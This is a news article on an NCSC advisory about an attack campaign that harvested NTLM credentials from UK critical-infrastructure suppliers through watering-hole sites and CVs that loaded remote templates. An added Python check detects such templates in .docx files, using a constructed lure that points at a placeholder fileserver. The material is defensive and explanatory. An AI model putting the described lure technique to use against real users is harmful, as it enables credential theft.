April 6, 2018

Critical National Infrastructure Supply Chain under Sustained Attack: NCSC

The attack has been ongoing since March 2017.

By CBR Staff Writer

The UK’s National Cyber Security Council (NCSC) has warned of an ongoing attack campaign against multiple companies involved in the Critical National Infrastructure (CNI) supply chain – with the hostile attacks focused on engineering and industrial control companies.

The attack, ongoing since March 2017, has involved the harvesting of NTLM credentials via Server Message Block (SMB) using strategic web compromises and spear-phishing.
Target networks are attacked in one of two main ways, the NCSC said in a comprehensive advisory published on Thursday.

1 – The attacker carries out a watering hole attack, compromising a website of interest to the target, and adding a link to a resource located on a malicious fileserver.

2 – The attacker sends a spear-phishing email from a compromised account containing a document of interest. In several instances, stolen CVs have been used, which are configured to load a remote template from the malicious fileserver.

On that fileserver the attacker runs Inveigh, a publicly available PowerShell SMB/HTTP man-in-the-middle tool, and harvests the NTLM hashes sent to it by target hosts as they attempt to log on and load the linked resources.
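As an added example (not code from the NCSC advisory or this article), the check below inspects a .docx for the remote-template reference used by the lure CVs described above: Word records an attached template in word/_rels/settings.xml.rels, and a relationship with TargetMode="External" pointing at a UNC path or URL is fetched on open, which is what sends the NTLM authentication to the attacker's fileserver. The sample document and the fileserver.invalid path are constructed for the demonstration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Added example, not code from the NCSC advisory or the article.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")

def external_templates(docx_bytes: bytes) -> list[str]:
    """Return targets of attachedTemplate relationships marked External.

    Word keeps the remote-template reference in word/_rels/settings.xml.rels.
    An External target is fetched when the file opens; a UNC path there means an
    outbound SMB connection that carries the user's NTLM authentication.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/_rels/settings.xml.rels" not in z.namelist():
            return hits                      # no settings relationships at all
        root = ET.fromstring(z.read("word/_rels/settings.xml.rels"))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if rel.get("Type") == ATTACHED_TEMPLATE and rel.get("TargetMode") == "External":
                hits.append(rel.get("Target", ""))
    return hits

def leaves_the_host(target: str) -> bool:
    """True for targets that trigger a network fetch: UNC, file:// or http(s):// ."""
    return re.match(r"^(\\\\|//|file:|https?:)", target, re.IGNORECASE) is not None

def build_sample_docx(template_target: str) -> bytes:
    """Constructed minimal .docx with only the parts the check above reads."""
    rels = (f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
            f'Type="{ATTACHED_TEMPLATE}" Target="{template_target}" '
            'TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()

if __name__ == "__main__":
    # Constructed sample pointing at a placeholder UNC path, as a lure CV would.
    for t in external_templates(build_sample_docx(r"\\fileserver.invalid\share\cv.dotm")):
        print("remote template:", t, "(network fetch)" if leaves_the_host(t) else "")
```

Run it over mail-gateway or quarantine samples; a template target that resolves outside the organisation is the indicator that the document would make an outbound SMB or HTTP request on open.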

The attackers have been highlighted by threat intelligence companies and dubbed Berserk Bear, Energetic Bear, Dragonfly, Havex and Crouching Yeti.


Mitigation

Piers Wilson, Head of Product Management at Huntsman Security, said in an emailed statement: “Organisations must accept that traditional defences – firewalls, anti-virus etc. – are simply not enough and emphasis needs to shift away from just blocking attackers, to intelligent and rapid detection, containment and mitigation as soon as an attack begins. In the digital age, everyone – from the government and critical infrastructure organisations to businesses and charities – needs to accept that they can’t stop every attack at the boundary. Shifting focus will help to keep them and the rest of the UK safe.”

For mitigation, the NCSC listed the following approaches.

Phishing
Mitigating Malware
Preventing Lateral Movement
Network Security
Management Interfaces
Monitoring
Incident Management
